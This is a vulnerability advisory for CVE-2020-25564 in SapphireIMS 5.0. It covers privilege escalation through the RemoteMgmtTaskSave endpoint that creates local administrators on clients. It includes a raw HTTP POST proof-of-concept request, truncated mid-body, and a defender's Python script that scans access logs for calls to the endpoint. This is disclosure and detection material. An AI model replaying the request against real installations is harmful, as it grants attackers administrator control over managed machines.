[CVE-2020-25564] SapphireIMS: Unprivileged user remote command execution (create local admin on clients)
Posted on
Sep 19, 2020
Description
In SapphireIMS 5.0, it is possible to create a local administrator on any client with the credentials of a non-privileged user by directly accessing the RemoteMgmtTaskSave (Automation Tasks) feature.
CVSS 3.0 Base Score 9.9 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
Researcher Tanoy Bose
POC
```http
POST /SapphireIMS/RemoteMgmtTaskSave?mainmenu=yes HTTP/1.1
Host: 192.168.191.48
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1619
Origin: http://192.168.191.48
Connection: close
Referer: http://192.168.191.48/SapphireIMS/TaskConfiguration.jsp?jobTypeId=2017&TaskName=User%20Management&SubTaskName=User%20Account%20Creation&Taskid=1002&mainmenu=yes&SelectedSite=1
Cookie: JSESSIONID=Ni+9V4wVLLkXCe5J0mirr2P4
Upgrade-Insecure-Requests: 1

applicationLogoutTypeOldUI=0&nodupSite=1&mainMenuID=yes&WMIIndex=0&WMITabName=WMI&paramReq1=1&TabList=1&JobIDList=10005&IsparamRequired=1&JobID=10005&TabList=Scheduler&SNMPShowHosts=0&WMIShowHosts=1&WBEMShowHosts=0&SSHShowHosts=0&SelectedSite=1&SelectedTabList=1%2C10005%7C%26%26%7C&param_List=10005%2C1%240%2C1%241%7C%3D%
```
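For defenders reviewing whether this endpoint has been called, the following added example (not part of the original advisory or of SapphireIMS) scans web access logs for POSTs to RemoteMgmtTaskSave. It assumes Apache/NGINX "combined" format logs from the server or a reverse proxy in front of it; the `admin_hosts` allowlist and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Endpoint named in the advisory; compared case-insensitively after decoding.
TARGET_PATH = "/sapphireims/remotemgmttasksave"

# Assumption: the server (or a reverse proxy in front of it) writes
# Apache/NGINX "combined" format access logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_task_saves(lines, admin_hosts=frozenset()):
    """Return one dict per POST to RemoteMgmtTaskSave.

    admin_hosts is a hypothetical allowlist of workstations that are
    expected to schedule automation tasks; anything else is flagged.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue  # skips malformed lines and non-POST requests
        # Decode %xx and drop the query string before comparing paths.
        path = unquote(urlsplit(m["target"]).path).lower().rstrip("/")
        if path != TARGET_PATH:
            continue
        hits.append({
            "time": m["ts"],
            "client": m["ip"],
            "status": int(m["status"]),
            "unexpected": m["ip"] not in admin_hosts,
        })
    return hits

# Constructed sample log lines (not taken from a real system).
SAMPLE_LOG = [
    '10.0.0.5 - - [19/Sep/2020:10:01:02 +0000] "GET /SapphireIMS/TaskConfiguration.jsp?jobTypeId=2017 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [19/Sep/2020:10:01:30 +0000] "POST /SapphireIMS/RemoteMgmtTaskSave?mainmenu=yes HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '10.0.0.77 - - [19/Sep/2020:11:15:09 +0000] "POST /SapphireIMS/%52emoteMgmtTaskSave?mainmenu=yes HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    'truncated line with no request field',
]

if __name__ == "__main__":
    for hit in find_task_saves(SAMPLE_LOG, admin_hosts={"10.0.0.5"}):
        print(hit)
```

Access logs do not record the role of the session that made the request, so each hit still has to be correlated with the account that was logged in from that client at that time.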
Disclosure timelines
07 May, 2020 - Vendor informed; failed
16 Sept, 2020 - CERT/CC and CERT-In informed